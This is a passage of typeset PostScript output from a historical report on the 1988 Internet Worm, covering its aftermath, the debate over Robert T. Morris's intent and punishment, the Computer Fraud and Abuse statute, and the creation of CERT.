3475(Robert)S
3784(T.)S
3907(Morris,)S
4241(son)S
4417(of)S
4537(the)S
4696(National)S
3480 V
1260(Computer)S
1690(Security)S
2053(Center's)S
2421(chief)S
2650(scientist,)S
3033(Robert)S
3335(Morris.[18])S
3780 V
10 B
720(November)S
1193(5,)S
1298(1988)S
3960 V
10 R
720(0147)S
1260(Mailing)S
1621(is)S
1732(made)S
1992(to)S
10 I
2114(phage)S
10 R
2402(mailing)S
2752(list)S
2919(by)S
3063(Erik)S
3279(Fair)S
3484(of)S
3612(Apple)S
3901(claiming)S
4296(he)S
4435(had)S
4624(heard)S
4890(that)S
4080 V
1260(Robert)S
1568(Morse)S
1859(\(sic\))S
2072(was)S
2263(the)S
2421(author)S
2712(of)S
2831(the)S
2989(Worm)S
3280(and)S
3459(that)S
3644(its)S
3774(release)S
4085(was)S
4275(an)S
4404(accident.)S
4796(\(mail\))S
4200 V
1260(This)S
1478(news)S
1723(was)S
1918(relayed)S
2251(though)S
2569(various)S
2903(mail)S
3121(messages)S
3538(and)S
3723(appears)S
4068(to)S
4187(have)S
4416(originated)S
4862(with)S
4320 V
1260(John)S
1479(Markho)S
1795 H
	(f)show 10 -.5 mul h (f)show
10 R
1856(.)S
4440 V
720(1632)S
1260(Andy)S
1534(Sudduth)S
1920(acknowledges)S
2538(authorship)S
3013(of)S
3149(anonymous)S
3663(warning)S
4043(to)S
4174(TCP-IP)S
4533(mailing)S
4892(list.)S
4560 V
1260(\(mail\))S
4776 V
970(By)S
1128(Tuesday,)S
1532(November)S
1994(8,)S
2110(most)S
2346(machines)S
2765(had)S
2951(connected)S
3397(back)S
3627(to)S
3747(the)S
3911(Internet)S
4263(and)S
4449(tra)S
4554 H
	(f)show 10 -.5 mul h (\256)show
10 R
4638(c)S
4724(patterns)S
4896 V
720(had)S
901(returned)S
1270(to)S
1385(near)S
1592(normal.)S
1966(That)S
2185(morning,)S
2585(about)S
2843(50)S
2979(people)S
3281(from)S
3511(around)S
3824(the)S
3982(country)S
4323(met)S
4509(with)S
4723(o)S
4773 H
	(f)show 10 -.5 mul h (\256)show
10 R
4857(cials)S
5016 V
720(of)S
847(the)S
1013(National)S
1401(Computer)S
1846(Security)S
2224(Center)S
2535(at)S
2652(a)S
2741(hastily)S
3053(convened)S
3480(``post-mortem'')S
4168(on)S
4313(the)S
4480(Worm.)S
4835(They)S
5136 V
720(identify)S
1061(some)S
1302(likely)S
1560(future)S
1828(courses)S
2157(of)S
2270(action.)S
2569([1])S
5292 V
970(Network)S
1353(tra)S
1458 H
	(f)show 10 -.5 mul h (\256)show
10 R
1542(c)S
1620(analyzers)S
2030(continued)S
2458(to)S
2570(record)S
2858(infection)S
3248(attempts)S
3622(from)S
3851(\(apparently\))S
4373(Worm)S
4663(programs)S
5412 V
720(still)S
901(running)S
1242(on)S
1372(Internet)S
1712(machines.)S
2174(The)S
2359(last)S
2528(such)S
2741(instance)S
3098(occurred)S
3476(in)S
3584(the)S
3736(early)S
3965(part)S
4150(of)S
4263(December.)S
5362 V
7 R
4697(*)S
5652 V
10 B
720(5.)S
855(Aftermath)S
5808 V
10 R
970(In)S
1087(the)S
1243(weeks)S
1526(and)S
1704(months)S
2033(following)S
2456(the)S
2612(release)S
2923(of)S
3041(the)S
3198(Internet)S
3543(Worm,)S
3858(there)S
4092(have)S
4315(been)S
4538(a)S
4617(few)S
4801(topics)S
5928 V
720(hotly)S
960(debated)S
1304(in)S
1416(mailing)S
1756(lists,)S
1977(media)S
2255(coverage,)S
2673(and)S
2850(personal)S
3221(conversations.)S
3858(I)S
3924(view)S
4151(a)S
4228(few)S
4410(of)S
4526(these)S
4764(as)S
4880(par-)S
6048 V
720(ticularly)S
1083(signi\256cant,)S
1555(and)S
1729(will)S
1915(present)S
2233(them)S
2463(here.)S
6288 V
10 B
720(5.1.)S
930(Author,)S
1296(Intent,)S
1612(and)S
1804(Punishment)S
6444 V
10 R
970(Two)S
1183(of)S
1296(the)S
1448(\256rst)S
1634(questions)S
2042(to)S
2151(be)S
2276(asked\320even)S
2822(before)S
3107(the)S
3260(Worm)S
3546(was)S
3732(stopped\320were)S
4367(simply)S
4671(the)S
4824(ques-)S
6564 V
720(tions)S
951("Who?")S
1307(and)S
1487("Why?".)S
1898(Who)S
2128(had)S
2308(written)S
2627(the)S
2785(Worm,)S
3101(and)S
3281(why)S
3489(had)S
3669(he/she/they)S
4160(loosed)S
4457(it)S
4549(in)S
4662(the)S
4819(Inter-)S
6684 V
720(net?)S
964(The)S
1167(question)S
1554(of)S
1685("Who?")S
2053(was)S
2256(answered)S
2680(shortly)S
3006(thereafter)S
3436(when)S
3701(the)S
3872(New)S
4109(York)S
4363(Times)S
4662(identi\256ed)S
6804 V
720(Robert)S
1032(T.)S
1158(Morris.)S
1525(Although)S
1943(he)S
2077(has)S
2250(not)S
2418(publicly)S
2786(admitted)S
3176(authorship,)S
3663(and)S
3847(no)S
3987(court)S
4232(of)S
4355(law)S
4539(has)S
4712(yet)S
4874(pro-)S
6924 V
720(nounced)S
1101(guilt,)S
1353(there)S
1595(seems)S
1882(to)S
2003(be)S
2140(a)S
2227(large)S
2469(body)S
2712(of)S
2838(evidence)S
3236(to)S
3358(support)S
3702(such)S
3929(an)S
4067(identi\256cation.)S
4724(Various)S
7024 V
8 Y1
720(333333333333333333)S
7142 V
8 R
820(*)S
900(Private)S
1149(communication,)S
1688(NCSC)S
1923(sta)S
2011 H
	(f)show 8 -.5 mul h (f)show
8 R
2084(member.)S
7920 V
EP
%%Page: 14 15
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2767(- 14 -)S
840 V
720(Federal)S
1050(o)S
1100 H
	(f)show 10 -.5 mul h (\256)show
10 R
1184(cials)S
790 V
7 R
1367(\262)S
840 V
10 R
1434(have)S
1654(told)S
1842(me)S
1996(that)S
2178(they)S
2382(have)S
2602(obtained)S
2978(statements)S
3432(from)S
3658(multiple)S
4024(individuals)S
4501(to)S
4611(whom)S
4893(Mr.)S
960 V
720(Morris)S
1043(spoke)S
1327(about)S
1600(the)S
1773(Worm)S
2079(and)S
2274(its)S
2420(development.)S
3042(They)S
3298(also)S
3510(claim)S
3783(to)S
3912(have)S
4151(records)S
4495(from)S
4740(Cornell)S
1080 V
720(University)S
1181(computers)S
1636(showing)S
2014(early)S
2253(versions)S
2626(of)S
2749(the)S
2911(Worm)S
3206(code)S
3434(being)S
3696(tested)S
3969(on)S
4109(campus)S
4454(machines,)S
4896(and)S
1200 V
720(they)S
945(claim)S
1220(to)S
1350(have)S
1590(copies)S
1897(of)S
2032(the)S
2206(Worm)S
2513(code,)S
2778(found)S
3063(in)S
3193(Mr.)S
3392(Morris's)S
3788(account.)S
4175(The)S
4382(report)S
4672(from)S
4918(the)S
1320 V
720(Provost's)S
1134(o)S
1184 H
	(f)show 10 -.5 mul h (\256)show
10 R
1268(ce)S
1392(at)S
1500(Cornell)S
1836([11])S
2038(also)S
2235(names)S
2526(Robert)S
2834(T.)S
2956(Morris)S
3264(as)S
3383(the)S
3541(culprit,)S
3863(and)S
4043(presents)S
4406(convincing)S
4886(rea-)S
1440 V
720(sons)S
928(for)S
1074(that)S
1254(conclusion.)S
1596 V
970(Thus,)S
1231(the)S
1389(identity)S
1731(of)S
1851(the)S
2010(author)S
2302(appears)S
2643(well)S
2852(established,)S
3358(but)S
3523(his)S
3677(motive)S
3992(remains)S
4345(a)S
4426(mystery.)S
4840(Con-)S
1716 V
720(jectures)S
1068(have)S
1294(ranged)S
1603(from)S
1834(an)S
1965(experiment)S
2451(gone)S
2682(awry)S
2918(to)S
3033(a)S
3114(subconscious)S
3684(act)S
3837(of)S
3957(revenge)S
4309(against)S
4629(his)S
4783(father.)S
1836 V
720(All)S
881(of)S
997(this)S
1175(is)S
1275(sheer)S
1519(speculation,)S
2033(however,)S
2435(since)S
2674(no)S
2808(statement)S
3225(has)S
3392(been)S
3614(forthcoming)S
4142(from)S
4370(Mr.)S
4551(Morris.)S
4912(All)S
1956 V
720(we)S
872(have)S
1096(to)S
1210(work)S
1451(with)S
1665(is)S
1768(the)S
1926(decompiled)S
2427(code)S
2650(for)S
2801(the)S
2958(program)S
3331(and)S
3510(our)S
3678(understanding)S
4279(of)S
4397(its)S
4527(e)S
4571 H
	(f)show 10 -.5 mul h (f)show
10 R
4632(ects.)S
4877(It)S
4973(is)S
2076 V
720(impossible)S
1190(to)S
1304(intuit)S
1552(the)S
1710(real)S
1895(motive)S
2209(from)S
2439(those)S
2686(or)S
2805(from)S
3035(various)S
3365(individuals')S
3879(experiences)S
4386(with)S
4601(the)S
4760(author.)S
2196 V
720(We)S
901(must)S
1139(await)S
1397(a)S
1483(de\256nitive)S
1903(statement)S
2328(by)S
2470(the)S
2634(author)S
2931(to)S
3051(answer)S
3375(the)S
3539(question)S
3920(``Why?''.)S
4387(Considering)S
4918(the)S
2316 V
720(potential)S
1100(legal)S
1324(consequences,)S
1927(both)S
2135(criminal)S
2498(and)S
2672(civil,)S
2905(a)S
2979(de\256nitive)S
3387(statement)S
3800(from)S
4024(Mr.)S
4201(Morris)S
4503(may)S
4705(be)S
4829(some)S
2436 V
720(time)S
928(in)S
1036(coming,)S
1391(if)S
1482(it)S
1568(ever)S
1769(does.)S
2592 V
970(Two)S
1193(things)S
1478(have)S
1706(been)S
1934(noted)S
2196(by)S
2336(many)S
2598(people)S
2904(who)S
3116(have)S
3344(read)S
3555(the)S
3717(decompiled)S
4224(code,)S
4478(however)S
4862(\(this)S
2712 V
720(author)S
1009(included\).)S
1475(First,)S
1718(the)S
1874(Worm)S
2163(program)S
2535(contained)S
2957(no)S
3090(code)S
3311(that)S
3494(would)S
3777(explicitly)S
4188(cause)S
4442(damage)S
4785(to)S
4896(any)S
2832 V
720(system)S
1040(on)S
1182(which)S
1468(it)S
1566(ran.)S
1790(Considering)S
2321(the)S
2485(ability)S
2783(and)S
2969(knowledge)S
3449(evidenced)S
3896(by)S
4039(the)S
4204(code,)S
4460(it)S
4559(would)S
4852(have)S
2952 V
720(been)S
947(a)S
1030(simple)S
1336(matter)S
1629(for)S
1783(the)S
1943(author)S
2236(to)S
2352(have)S
2578(included)S
2960(such)S
3181(commands)S
3652(if)S
3751(that)S
3939(was)S
4132(his)S
4287(intent.)S
4608(Unless)S
4918(the)S
3072 V
720(Worm)S
1016(was)S
1213(released)S
1581(prematurely,)S
2130(it)S
2228(appears)S
2574(that)S
2766(the)S
2930(author's)S
3299(intent)S
3569(did)S
3739(not)S
3909(involve)S
4251(explicit,)S
4618(immediate)S
3192 V
720(destruction)S
1194(or)S
1307(damage)S
1647(of)S
1760(any)S
1934(data)S
2130(or)S
2243(systems.)S
3348 V
970(The)S
1163(second)S
1478(feature)S
1792(of)S
1913(note)S
2124(was)S
2318(that)S
2507(the)S
2668(code)S
2895(had)S
3078(no)S
3217(mechanism)S
3711(to)S
3828(halt)S
4017(the)S
4178(spread)S
4477(of)S
4599(the)S
4760(Worm.)S
3468 V
720(Once)S
969(started,)S
1299(the)S
1460(Worm)S
1754(would)S
2043(propagate)S
2475(while)S
2736(also)S
2936(taking)S
3225(steps)S
3464(to)S
3581(avoid)S
3842(identi\256cation)S
4408(and)S
4590(``capture.'')S
3588 V
720(Due)S
928(to)S
1048(this)S
1235(and)S
1421(the)S
1585(complex)S
1972(argument)S
2392(string)S
2663(necessary)S
3093(to)S
3214(start)S
3429(it,)S
3553(individuals)S
4041(who)S
4256(have)S
4487(examined)S
4918(the)S
3708 V
720(code)S
941(\(this)S
1152(author)S
1440(included\))S
1850(believe)S
2171(it)S
2260(unlikely)S
2621(that)S
2804(the)S
2959(Worm)S
3247(was)S
3435(started)S
3734(by)S
3867(accident)S
4232(or)S
4348(was)S
4536(intended)S
4912(not)S
3828 V
720(to)S
828(propagate)S
1251(widely.)S
3984 V
970(In)S
1090(light)S
1311(of)S
1431(our)S
1601(lack)S
1804(of)S
1924(de\256nitive)S
2339(information,)S
2874(it)S
2968(is)S
3073(puzzling)S
3455(to)S
3571(note)S
3781(attempts)S
4158(to)S
4274(defend)S
4583(Mr.)S
4768(Morris)S
4104 V
720(by)S
856(claiming)S
1242(that)S
1428(his)S
1581(intent)S
1844(was)S
2034(to)S
2147(demonstrate)S
2670(something)S
3122(about)S
3379(Internet)S
3724(security,)S
4100(or)S
4218(that)S
4403(he)S
4532(was)S
4722(trying)S
4996(a)S
4224 V
720(harmless)S
1108(experiment.)S
1645(Even)S
1883(the)S
2038(current)S
2353(president)S
2752(of)S
2868(the)S
3023(ACM)S
3284(implied)S
3624(that)S
3808(it)S
3898(was)S
4087(just)S
4266(a)S
4344(``prank'')S
4737(in)S
4849([17].)S
4344 V
720(It)S
819(is)S
924(curious)S
1256(that)S
1444(this)S
1627(many)S
1887(people,)S
2216(journalists)S
2670(and)S
2851(computer)S
3265(professionals)S
3829(alike,)S
4085(would)S
4372(assume)S
4703(to)S
4818(know)S
4464 V
720(the)S
872(intent)S
1130(of)S
1243(the)S
1395(author)S
1680(based)S
1938(on)S
2069(the)S
2222(observed)S
2613(behavior)S
2993(of)S
3107(the)S
3260(program.)S
3684(As)S
3826(Rick)S
4046(Adams)S
4360(of)S
4474(the)S
4627(Center)S
4924(for)S
4584 V
720(Seismic)S
1074(Studies)S
1406(observed)S
1803(in)S
1918(a)S
1999(posting)S
2330(to)S
2444(the)S
2602(Usenet,)S
2940(we)S
3092(may)S
3300(someday)S
3691(hear)S
3898(that)S
4084(the)S
4242(Worm)S
4533(was)S
4724(actually)S
4704 V
720(written)S
1033(to)S
1141(impress)S
1482(Jodie)S
1723(Foster\320we)S
2219(simply)S
2522(do)S
2652(not)S
2810(know)S
3062(the)S
3214(real)S
3393(reason.)S
4860 V
970(The)S
1160(Provost's)S
1573(report)S
1846(from)S
2075(Cornell,)S
2435(however,)S
2838(does)S
3056(not)S
3219(attempt)S
3555(to)S
3669(excuse)S
3976(Mr.)S
4159(Morris's)S
4539(behavior.)S
4979(It)S
4980 V
720(quite)S
966(clearly)S
1283(labels)S
1562(the)S
1730(actions)S
2059(as)S
2188(unethical)S
2600(and)S
2790(contrary)S
3168(to)S
3292(the)S
3460(standards)S
3882(of)S
4010(the)S
4177(computer)S
4599(profession.)S
5100 V
720(They)S
970(very)S
1192(clearly)S
1508(state)S
1736(that)S
1931(his)S
2093(actions)S
2421(were)S
2659(against)S
2988(university)S
3434(policy)S
3730(and)S
3920(accepted)S
4314(practice,)S
4700(and)S
4890(that)S
5220 V
720(based)S
977(on)S
1107(his)S
1254(past)S
1445(experience)S
1906(he)S
2030(should)S
2327(have)S
2545(known)S
2847(it)S
2933(was)S
3118(wrong)S
3403(to)S
3511(act)S
3657(as)S
3770(he)S
3894(did.)S
5376 V
970(Coupled)S
1346(with)S
1561(the)S
1720(tendency)S
2117(to)S
2232(assume)S
2564(motive,)S
2905(we)S
3059(have)S
3285(observed)S
3683(di)S
3761 H
	(f)show 10 -.5 mul h (f)show
10 R
3822(erent)S
4059(opinions)S
4442(on)S
4580(the)S
4740(punish-)S
5496 V
720(ment,)S
983(if)S
1082(any,)S
1288(to)S
1403(mete)S
1634(out)S
1799(to)S
1914(the)S
2073(author.)S
2420(One)S
2623(oft-expressed)S
3197(opinion,)S
3565(especially)S
4001(by)S
4138(those)S
4386(individuals)S
4868(who)S
5616 V
720(believe)S
1040(the)S
1194(Worm)S
1481(release)S
1789(to)S
1899(be)S
2025(an)S
2151(accident)S
2516(or)S
2632(an)S
2759(unfortunate)S
3252(experiment,)S
3759(is)S
3859(that)S
4042(the)S
4197(author)S
4485(should)S
4785(not)S
4946(be)S
5736 V
720(punished.)S
1182(Some)S
1456(have)S
1690(gone)S
1930(so)S
2065(far)S
2221(as)S
2350(to)S
2473(say)S
2651(that)S
2846(the)S
3013(author)S
3313(should)S
3625(be)S
3764(rewarded)S
4179(and)S
4368(the)S
4535(vendors)S
4896(and)S
5856 V
720(operators)S
1126(of)S
1244(the)S
1401(a)S
1445 H
	(f)show 10 -.5 mul h (f)show
10 R
1506(ected)S
1751(machines)S
2163(should)S
2465(be)S
2594(the)S
2751(ones)S
2969(punished,)S
3390(this)S
3570(on)S
3705(the)S
3862(theory)S
4152(that)S
4337(they)S
4544(were)S
4773(sloppy)S
5976 V
720(about)S
978(their)S
1197(security)S
1548(and)S
1727(somehow)S
2145(invited)S
2458(the)S
2615(abuse!)S
2940(The)S
3130(other)S
3370(extreme)S
3726(school)S
4022(of)S
4140(thought)S
4481(holds)S
4733(that)S
4918(the)S
6096 V
720(author)S
1015(should)S
1322(be)S
1456(severely)S
1828(punished,)S
2254(including)S
2672(at)S
2784(least)S
3007(a)S
3091(term)S
3314(in)S
3432(a)S
3516(Federal)S
3855(penitentiary.)S
4428(One)S
4635(somewhat)S
6216 V
720(humorous)S
1150(example)S
1518(of)S
1631(this)S
1806(was)S
1991(espoused)S
2387(by)S
2517(Mike)S
2758(Royko)S
3055([23].)S
6372 V
970(The)S
1166(Cornell)S
1507(commission)S
2032(recommended)S
2638(some)S
2891(punishment,)S
3425(but)S
3595(not)S
3765(punishment)S
4274(so)S
4405(severe)S
4701(that)S
4893(Mr.)S
6492 V
720(Morris's)S
1102(future)S
1378(career)S
1658(in)S
1774(computing)S
2240(would)S
2528(be)S
2660(jepordized.)S
3173(Consistent)S
3633(with)S
3848(that)S
4035(recommendation,)S
4768(Robert)S
6612 V
720(has)S
888(been)S
1111(suspended)S
1562(from)S
1791(the)S
1948(University)S
2405(for)S
2556(a)S
2635(minimum)S
3060(of)S
3178(one)S
3357(year;)S
3591(the)S
3748(faculty)S
4060(of)S
4178(the)S
4335(computer)S
4747(science)S
6732 V
720(department)S
1199(there)S
1428(will)S
1614(have)S
1832(to)S
1940(approve)S
2291(readmission)S
2804(should)S
3101(he)S
3225(apply)S
3477(for)S
3623(it.)S
6962 V
8 Y1
720(333333333333333333)S
7080 V
8 R
820(\262)S
900(Personal)S
1198(conversations,)S
1679(anonymous)S
2071(by)S
2175(request.)S
7920 V
EP
%%Page: 15 16
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2767(- 15 -)S
840 V
970(As)S
1111(has)S
1274(been)S
1492(observed)S
1882(in)S
1990(both)S
2198([16])S
2395( and)S
2600([8],)S
2772(it)S
2859(would)S
3140(not)S
3299(serve)S
3540(us)S
3660(well)S
3863(to)S
3972(overreact)S
4373(to)S
4482(this)S
4658(particular)S
960 V
720(incident;)S
1111(less)S
1302(than)S
1515(5%)S
1689(of)S
1813(the)S
1976(machines)S
2394(on)S
2535(an)S
2670(insecure)S
3043(network)S
3411(were)S
3645(a)S
3689 H
	(f)show 10 -.5 mul h (f)show
10 R
3750(ected)S
4001(for)S
4157(less)S
4347(than)S
4559(a)S
4643(few)S
4832(days.)S
1080 V
720(However,)S
1142(neither)S
1451(should)S
1750(we)S
1898(dismiss)S
2231(it)S
2319(as)S
2435(something)S
2885(of)S
3001(no)S
3134(consequence.)S
3761(That)S
3977(no)S
4110(damage)S
4453(was)S
4641(done)S
4868(may)S
1200 V
720(possibly)S
1096(have)S
1326(been)S
1556(an)S
1692(accident,)S
2091(and)S
2277(it)S
2375(is)S
2483(possible)S
2852(that)S
3043(the)S
3206(author)S
3502(intended)S
3887(for)S
4044(the)S
4207(program)S
4586(to)S
4705(clog)S
4918(the)S
1320 V
720(Internet)S
1067(as)S
1187(it)S
1280(did)S
1445(\(comments)S
1926(in)S
2041(his)S
2195(code,)S
2445(as)S
2565(reported)S
2935(in)S
3051(the)S
3211(Cornell)S
3549(report,)S
3850(suggested)S
4282(even)S
4508(more)S
4751(sinister)S
1440 V
720(possibilities\).)S
1323(Furthermore,)S
1882(we)S
2033(should)S
2335(be)S
2464(careful)S
2775(of)S
2893(setting)S
3195(a)S
3274(dangerous)S
3719(precedent)S
4141(for)S
4292(future)S
4565(occurrences)S
1560 V
720(of)S
837(such)S
1054(behavior.)S
1492(Excusing)S
1898(acts)S
2087(of)S
2204(computer)S
2615(vandalism)S
3060(simply)S
3367(because)S
3716(their)S
3933(authors)S
4261(claim)S
4517(there)S
4750(was)S
4940(no)S
1680 V
720(intent)S
978(to)S
1086(cause)S
1337(damage)S
1677(will)S
1863(do)S
1993(little)S
2207(to)S
2315(discourage)S
2777(repeat)S
3050(o)S
3100 H
	(f)show 10 -.5 mul h (f)show
10 R
3161(enses,)S
3432(and)S
3606(may)S
3808(encourage)S
4247(new)S
4443(incidents.)S
1836 V
970(The)S
1177(claim)S
1451(that)S
1653(the)S
1828(victims)S
2176(of)S
2312(the)S
2487(Worm)S
2795(were)S
3041(somehow)S
3477(responsible)S
3985(for)S
4154(the)S
4329(invasion)S
4721(of)S
4857(their)S
1956 V
720(machines)S
1132(is)S
1234(also)S
1430(curious.)S
1814(The)S
2004(individuals)S
2484(making)S
2819(this)S
2999(claim)S
3256(seem)S
3496(to)S
3609(be)S
3738(stating)S
4040(that)S
4225(there)S
4459(is)S
4561(some)S
4807(moral)S
2076 V
720(or)S
840(legal)S
1071(obligation)S
1514(for)S
1667(computer)S
2081(users)S
2323(to)S
2438(track)S
2674(and)S
2855(install)S
3137(every)S
3395(conceivable)S
3908(security)S
4261(\256x)S
4404(and)S
4585(mechanism)S
2196 V
720(available.)S
1171(This)S
1385(totally)S
1677(ignores)S
2007(the)S
2165(many)S
2422(sites)S
2635(that)S
2820(run)S
2988(turn-key)S
3361(systems)S
3713(without)S
4054(source)S
4349(code)S
4572(or)S
4690(adminis-)S
2316 V
720(trators)S
1024(knowledgeable)S
1677(enough)S
2020(to)S
2147(modify)S
2485(their)S
2717(systems.)S
3138(Those)S
3431(sites)S
3659(may)S
3881(also)S
4092(be)S
4236(running)S
4597(specialized)S
2436 V
720(software)S
1097(or)S
1214(have)S
1436(restricted)S
1841(budgets)S
2186(that)S
2370(prevent)S
2703(them)S
2937(from)S
3165(installing)S
3572(new)S
3772(software)S
4148(versions.)S
4569(Many)S
4835(com-)S
2556 V
720(mercial)S
1056(and)S
1237(government)S
1751(sites)S
1966(operate)S
2296(their)S
2516(systems)S
2871(this)S
3054(way.)S
3313(To)S
3462(attempt)S
3800(to)S
3916(blame)S
4198(these)S
4441(individuals)S
4924(for)S
2676 V
720(the)S
874(success)S
1205(of)S
1320(the)S
1474(Worm)S
1760(is)S
1858(equivalent)S
2305(to)S
2414(blaming)S
2773(an)S
2898(arson)S
3145(victim)S
3432(for)S
3579(the)S
3732(\256re)S
3896(because)S
4242(she)S
4406(didn't)S
4676(build)S
4913(her)S
2796 V
720(house)S
983(of)S
1096(\256reproof)S
1475(metal.)S
1782(\(More)S
2061(on)S
2191(this)S
2366(theme)S
2640(can)S
2808(be)S
2932(found)S
3195(in)S
3303([27].\))S
2952 V
970(The)S
1163(matter)S
1456(of)S
1577(appropriate)S
2069(punishment)S
2574(will)S
2768(likely)S
3034(be)S
3166(decided)S
3514(by)S
3652(a)S
3734(Federal)S
4071(judge.)S
4386(A)S
4496(grand)S
4762(jury)S
4962(in)S
3072 V
720(Syracuse,)S
1144(NY)S
1327(has)S
1499(been)S
1726(hearing)S
2064(testimony)S
2498(on)S
2637(the)S
2798(matter.)S
3147(A)S
3258(Federal)S
3596(indictment)S
4063(under)S
4329(the)S
4490(United)S
4801(States)S
3192 V
720(Code,)S
986(Title)S
1205(18)S
1335(\247)S
1415(1030)S
1645(\(the)S
1830(Computer)S
2260(Fraud)S
2523(and)S
2697(Abuse)S
2982(statute\),)S
3331(parts)S
3555(\(a\)\(3\))S
3811(or)S
3925(\(a\)\(5\))S
4182(might)S
4447(be)S
4572(returned.)S
4990(\247)S
3312 V
720(\(a\)\(5\),)S
1008(in)S
1123(particular,)S
1567(is)S
1671(of)S
1791(interest.)S
2177(That)S
2397(part)S
2588(of)S
2707(the)S
2865(statute)S
3162(makes)S
3453(it)S
3545(a)S
3625(felony)S
3916(if)S
4013(an)S
4143(individual)S
4585(``intention-)S
3432 V
720(ally)S
901(accesses)S
1269(a)S
1344(Federal)S
1674(interest)S
1999(computer)S
2407(without)S
2744(authorization,)S
3327(and)S
3502(by)S
3633(means)S
3919(of)S
4033(one)S
4208(or)S
4322(more)S
4559(instances)S
4957(of)S
3552 V
720(such)S
944(conduct)S
1301(alters,)S
1583(damages,)S
1998(or)S
2122(destroys)S
2496(information)S
3009(...,)S
10 I
3150(or)S
3280(prevents)S
3659(authorized)S
4128(use)S
10 R
4302(of)S
4426(any)S
4611(such)S
4835(com-)S
3672 V
720(puter)S
968(or)S
1094(information)S
1609(and)S
1796(thereby)S
10 I
2138(causes)S
2447(loss)S
2646(to)S
2767(one)S
2954(or)S
3086(more)S
3334(others)S
3627(of)S
3748(a)S
3841(value)S
4100(aggregating)S
4632($1,000)S
4951(or)S
3792 V
720(more)S
10 R
962(during)S
1260(any)S
1441(one)S
1622(year)S
1830(period;'')S
2216(\(emphasis)S
2658(mine\).)S
2982(The)S
3173(penalty)S
3503(if)S
3600(convicted)S
4024(under)S
4287(section)S
4606(\(a\)\(5\))S
4868(may)S
3912 V
720(include)S
1044(a)S
1118(\256ne)S
1298(and)S
1472(a)S
1546(\256ve)S
1726(year)S
1927(prison)S
2207(term.)S
2475(State)S
2705(and)S
2879(civil)S
3087(suits)S
3301(might)S
3565(also)S
3756(be)S
3880(brought)S
4221(in)S
4329(this)S
4504(case.)S
4152 V
10 B
720(5.2.)S
930(Worm)S
1237(Hunters)S
4308 V
10 R
970(A)S
1090(signi\256cant)S
1555(conclusions)S
2075(reached)S
2432(at)S
2552(the)S
2722(NCSC)S
3032(post-mortem)S
3592(workshop)S
4035(was)S
4239(that)S
4438(the)S
4609(reason)S
4918(the)S
4428 V
720(Worm)S
1006(was)S
1192(stopped)S
1534(so)S
1654(quickly)S
1985(was)S
2171(due)S
2346(almost)S
2644(solely)S
2914(to)S
3023(the)S
3176(U)S
8 R
3248(NIX)S
10 R
3421(``old-boy'')S
3895(network,)S
4278(and)S
4453(not)S
4612(because)S
4957(of)S
4548 V
720(any)S
895(formal)S
1192(mechanism)S
1678(in)S
1787(place)S
2028(at)S
2131(the)S
2284(time.)S
2518([1])S
2665(A)S
2768(general)S
3092(recommendation)S
3794(from)S
4019(that)S
4201(workshop)S
4627(was)S
4814(that)S
4996(a)S
4668 V
720(formal)S
1023(crisis)S
1271(center)S
1551(be)S
1682(established)S
2163(to)S
2278(deal)S
2481(with)S
2696(future)S
2971(incidents)S
3369(and)S
3550(to)S
3665(provide)S
4007(a)S
4088(formal)S
4391(point)S
4633(of)S
4752(contact)S
4788 V
720(for)S
866(individuals)S
1341(wishing)S
1688(to)S
1796(report)S
2064(problems.)S
2521(No)S
2673(such)S
2886(center)S
3159(was)S
3344(established)S
3818(at)S
3920(that)S
4100(time.)S
4944 V
970(On)S
1138(November)S
1605(29,)S
1776(someone)S
2177(exploiting)S
2629(a)S
2719(security)S
3082(\257aw)S
3301(present)S
3636(in)S
3761(older)S
4013(versions)S
4393(of)S
4523(the)S
4692(FTP)S
4912(\256le)S
5064 V
720(transfer)S
1070(program)S
1454(broke)S
1727(into)S
1929(a)S
2019(machine)S
2403(on)S
2549(the)S
2717(MILnet.)S
3123(The)S
3324(intruder)S
3686(was)S
3887(traced)S
4176(to)S
4300(a)S
4390(machine)S
4773(on)S
4918(the)S
5184 V
720(Arpanet,)S
1104(and)S
1286(to)S
1402(prevent)S
1739(further)S
2048(access)S
2340(the)S
2500(MILnet/Arpanet)S
3193(links)S
3427(were)S
3659(immediately)S
4198(severed.)S
4596(During)S
4918(the)S
5304 V
720(next)S
927(48)S
1062(hours)S
1319(there)S
1553(was)S
1743(considerable)S
2282(confusion)S
2711(and)S
2890(rumor)S
3169(about)S
3426(the)S
3583(disconnection,)S
4198(fueled)S
4482(in)S
4595(part)S
4784(by)S
4918(the)S
5424 V
720(Defense)S
1077(Communication)S
1754(Agency's)S
2168(attempt)S
2500(to)S
2610(explain)S
2936(the)S
3090(disconnection)S
3677(as)S
3792(a)S
3868(``test'')S
4171(rather)S
4435(than)S
4639(as)S
4754(a)S
4830(secu-)S
5544 V
720(rity)S
889(problem.)S
5700 V
970(This)S
1193(event,)S
1479(coming)S
1824(as)S
1952(close)S
2202(as)S
2330(it)S
2431(did)S
2604(to)S
2727(the)S
2894(Worm)S
3194(incident,)S
3586(prompted)S
4014(DARPA)S
4398(to)S
4522(establish)S
4918(the)S
5820 V
720(CERT\320the)S
1243(Computer)S
1688(Emergency)S
2187(Response)S
2614(Team\320at)S
3057(the)S
3223(Software)S
3627(Engineering)S
4159(Institute)S
4531(at)S
4647(Carnegie-)S
5940 V
720(Mellon)S
1041(University.)S
5890 V
7 R
1488(*)S
5940 V
10 R
1555(The)S
1742(purpose)S
2090(of)S
2205(the)S
2359(CERT)S
2647(is)S
2746(to)S
2856(act)S
3004(as)S
3119(a)S
3195(central)S
3498(switchboard)S
4018(and)S
4194(coordinator)S
4686(for)S
4835(com-)S
6060 V
720(puter)S
958(security)S
1307(emergencies)S
1838(on)S
1971(Arpanet)S
2325(and)S
2501(MILnet)S
2838(computers.)S
3341(The)S
3528(Center)S
3826(has)S
3991(asked)S
4250(for)S
4398(volunteers)S
4846(from)S
6180 V
720(Federal)S
1049(agencies)S
1422(and)S
1596(funded)S
1903(laboratories)S
2404(to)S
2512(serve)S
2752(as)S
2865(technical)S
3255(advisors)S
3618(when)S
3864(needed.[2])S
6336 V
970(Of)S
1110(interest)S
1439(here)S
1645(is)S
1747(that)S
1932(the)S
2089(CERT)S
2380(is)S
2482(not)S
2645(chartered)S
3050(to)S
3164(deal)S
3366(with)S
3580(just)S
3761(any)S
3941(Internet)S
4287(emergency.)S
4815(Thus,)S
6456 V
720(problems)S
1129(detected)S
1498(in)S
1613(the)S
1772(CSnet,)S
2078(Bitnet,)S
2384(NSFnet,)S
